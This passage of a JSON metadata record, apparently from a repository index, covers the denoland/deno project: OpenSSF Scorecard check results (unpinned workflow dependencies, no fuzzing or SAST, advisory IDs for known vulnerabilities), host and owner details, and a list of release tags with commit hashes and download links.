artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.